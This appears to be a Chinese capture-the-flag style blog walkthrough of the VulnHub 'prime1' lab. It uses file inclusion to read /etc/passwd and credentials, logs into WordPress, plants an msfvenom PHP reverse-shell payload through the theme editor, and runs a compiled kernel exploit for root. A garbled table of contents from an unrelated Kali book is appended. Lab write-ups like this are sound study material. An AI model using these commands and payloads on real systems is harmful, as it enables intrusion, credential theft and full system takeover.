kali渗透之从0到root的操作系统渗透全过程

目录

攻击机

靶机

扫目录

根据提示进行fuzz:模糊测试

尝试wordpress

接下进行注入,在主题编辑器里进行写入木马

提权


注:以下内容仅供学习,请勿用于非法途径

攻击机

kali

靶机

prime1

链接: https://pan.baidu.com/s/1DEXUTVoRNhaYw_CqNzEqow?pwd=4bm5 提取码: 4bm5

或者直接去vulnhub.com下载,里面有各类镜像

首先进入靶机

发现什么都没有

扫目录

dirb 目标域名

dirb 目标域名 -X .txt,.php,.zip(过滤)

分别访问这几个地址,发现提示

根据提示进行fuzz:模糊测试

fuzz的功能有

  1. 目录扫描

  2. 找参数

  3. 密码爆破 username password

  4. 找SQL,XSS

  5. 压力测试

kali有自带(-w 指定字典路径)

wfuzz -w http://192.168.0.x/index.php?FUZZ(正常扫描)

wfuzz -w --hw 12 http://192.168.0.x/index.php?FUZZ(过滤扫描)

wfuzz -w /usr/share/wordlists/dirb/common.txt --hw 12 http://192.168.0.103/index.php?FUZZ

file?推测是文件包含,然后记得之前的提示

所以file=location.txt

http://192.168.0.103/index.php?file=location.txt

根据提示进一步深入

http://192.168.0.103/image.php?secrettier360=/etc/passwd

:find password.txt file in my directory:/home/saket

进一步深入

http://192.168.0.103/image.php?secrettier360=/home/saket/password.txt

疑似的密码

follow_the_ippsec

所以22端口这里可能不行,换一条线

尝试wordpress

http://192.168.0.103/wordpress/

可以通过author=?来确定用户名

或者直接用wpscan进行扫描得到用户名

wpscan --url xxx --enumerate u(专门扫描wordpress的)

wpscan --url http://192.168.0.103/wordpress --enumerate u

用刚刚得到的密码和用户进行登录

Victor

follow_the_ippsec

接下进行注入,在主题编辑器里进行写入木马

一个个试最后发现在这里可以写入

利用MSF生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -o shell

.php

复制,主要不要把开头的/*复制进去,粘贴到WP

启动监听

开始连接

http://192.168.0.103/wordpress/wp-content/themes/twentynineteen/secret.php

成功建立会话

提权

查找刚刚扫出来的版本是否存在可利用漏洞

msf6 > searchsploit 16.04 Ubuntu

编译好文件然后上传进行提权

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

编译用gcc

gcc 45010.c -o 45010

利用msf上传到tmp目录,因为tmp 任何一个目录都可以执行权限

meterpreter > upload /root/45010 /tmp/45010

进入shell进行加权和执行

cd /tmp

chmod +x 45010

./45010

第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值